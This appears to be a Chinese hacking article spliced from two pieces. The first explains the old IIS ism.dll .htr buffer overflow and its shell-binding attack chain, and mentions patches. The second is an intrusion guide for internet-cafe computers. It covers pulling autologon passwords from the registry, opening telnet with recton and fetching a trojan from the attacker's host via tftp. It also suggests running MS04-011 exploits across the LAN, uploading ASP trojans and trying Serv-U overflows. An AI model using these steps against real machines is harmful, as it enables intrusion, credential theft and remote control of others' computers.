如何攻击服务器

Web服务器将成为下一代黑客施展妖术的对象。在很大程度上，进行这种攻击只需一个Web浏览器和一个创造性的头脑。以前，黑客的攻击对象集中在操作系统和网络协议上，但随着这些攻击目标的弱点和漏洞逐渐得到修补，要进行这类攻击已经变得非常困难。操作系统正在变得更加稳健，对攻击的抵抗能力日益提高。随着身份验证和加密功能渐渐被内置到网络协议中，网络协议也变得更加安全。此外，防火墙也越来越智能，成为网络和系统的外部保护屏障。

　　　　另一方面，电子商务技术正在日益普及开来，其复杂性有增无减。基于Web的应用程序正在与基本的操作系统和后端数据库更加紧密地集成在一起。遗憾的是，人们在基于Web的基础设施安全性方面所做的工作还很不够。Web服务器和Web应用程序中的弱点被发现的速度为何这么快呢

　　　　有很多因素促成了这种Web黑客活动的快速增加。其中最主要的原因是防火墙允许所有的Web通信都可以进出网络，而防火墙无法防止对Web服务器程序及其组件或Web应用程序的攻击。第二个原因是，Web服务器和基于Web的应用程序有时是在“功能第一，安全其次”的思想指导下开发出来的。

　　　　当您的Web服务器面临巨大威胁时，怎样保障它们的安全呢这就需要您不断了解新信息，新情况，每天跟踪您所用服务器的有关网站，阅读相关新闻并向它进行咨询。为了让你着手这方面的工作，下面介绍黑客对NT系统的四种常用攻击手段，同时介绍如何防止这类攻击。

　　Microsoft IIS ismdll缓冲区溢出受影响的服务器：运行IIS 40并带有“Service Pack 3/4/5”的Windows NT服务器　　MicrosoftIIS缓冲区溢出这一安全弱点是Web服务器无时不有的重大缺陷之一。该弱点被称为IIS eEye，这个名称来自发现此问题的一个小组。在实施缓冲区溢出攻击时，黑客向目标程序或服务输入超出程序处理能力的数据，导致程序突然终止。另外，还可以通过设置，在执行中的程序终止运行前，用输入的内容来覆盖此程序的某些部分，这样就可以在服务器的安全权限环境下执行任意黑客命令。

　　　　eEye发现，IIS用来解释HTR文件的解释程序是ismdll，它对缓冲区溢出攻击的抵抗力十分脆弱。如果攻击者将一个以htr结尾的超长文件名(大约3,000个字符，或更多)传递给IIS，那么输入值将在ismdll中造成输入缓冲区溢出，并导致IIS崩溃。如果攻击者输入的不是一串字母而是可执行代码(通常称为“鸡蛋”或“外壳代码”)，那么在IIS终止之前将执行该代码。由eEye小组发现的这一攻击方法

　　包括三个步骤：

　　1创建一个用于侦听任意TCP端口上连接活动的程序。一旦接收到连接信号，该程序将执行一个Windows命令外壳程序(cmdexe)，并将该外壳与连接绑定在一起。这个程序是经过修改的Netcat。Netcat是一个流行的网络连接实用程序，其源代码可以免费获得。

　　2在IIS的ismdll中制造缓冲区溢出，并使IIS从外部Web站点下载侦听程序(由步骤1产生)。

　　3执行刚下载的程序(由步骤2产生)，该程序将等待传入的连接并使攻击者进入Windows命令外壳程序中。

　　　　由于缓冲区溢出导致IIS在崩溃之前转而运行Windows命令外壳，所以该外壳程序将在IIS的安全权限背景下运行，而该安全权限背景等价于NT Administrator权限。这样，攻击者要做的只是与被攻击的IIS服务器的侦听端口建立连接，然后等着出现c:>提示就万事大吉了。现在，攻击者拥有对整个NT服务器的管理权限，可以做任何事，比如，添加新用户、修改服务器的内容、格式化驱动器，甚至将该服务器用作攻击其它系统的踏脚石。

　　　　运行IIS 40并带有“Service Pack 3/4/5”的Windows NT服务器容易受到此类攻击。Microsoft已经发布了对该弱点的修补程序。Windows NT Service Pack 6也已经修补了该问题。

一

网吧入侵

入侵的方法很多，但对网吧入侵最常用的方法是什么呢？首先，自动登陆。现在网吧一般都是win2000或者

windows

xp的机器，网管一般都把机子设置为自动登陆！这样我们开机进入系统的时候登陆窗口一闪而过！着时候如果我们findfassexe试图把登陆账号密码找出来是不会成功的！因为账号密码根本不在内存中，而findfassexe通过winlogon的PID号和正确的域名中，在内存寻找好段加了密的内存块(保存着加密过的登陆密码)，然后对它进行解密，这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Winlogon\这个目录下，AutoAdminLogon这一项的键值为1，表示自动登陆。为1的时候，打开控制面板的用户和密码，会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名，DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能，原理是一样的，不过因为权限的问题，不一定能读出来。这样，密码账号我们都找出来了。

你要知道，一个网吧的自动登陆密码账号一般都是一样的，而且网管为了方便网虫上网一般把他们设置在管理员组，至少user组。知道了密码账号还愁入侵不了么？网吧机子的server服务一般是禁用的，那我们就不能用ipc入侵了。opentelnetexe我们也用不了，因为着个也依赖ipc连接，

dameware远程控制也不行，道理一样。我们可以用recton着个小巧实用的工具来开telnet，这个工具在win2000下面特别好使。

开了telnet后，我们telnet上去，先在本机打开tftpd32exe,再telnet下面telnet

-i

myip

get

3721exe

c:\3721exe,这样就把我们的木马3721exe比如radmin传过去了。

再在telnet下面直接运行3721exe就ok了。

另一个方法就是ms04011漏洞，别以为着个漏洞已经过时了，在网吧这个漏洞还是相当普遍的，许多网吧的网管只会装游戏，重装系统，不重视着写漏洞，懒得打补丁！我们用DSScan扫描19216801-1921680255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出，一下子就得到了系统权限。

还有很多入侵方法，你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令，实际上这个工具扫用户账号密码很弱，以前我试过，我用上面第一种方法发现网吧都有一个密码为空的管理员账号，用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐

——火狐端口扫描器来扫一下网吧主机，第一服务器等。着个扫描器速度很快，扫1到10000端口也要不了几分钟。如果发现服务器开80断口，自然是看是不是架设了网站。再看网站十分有漏洞，想办法传个asp木马上去提升权限。如果发现**服务器装了serv_u,而且你有了一个账号，可以尝试一下

serv_u的溢出。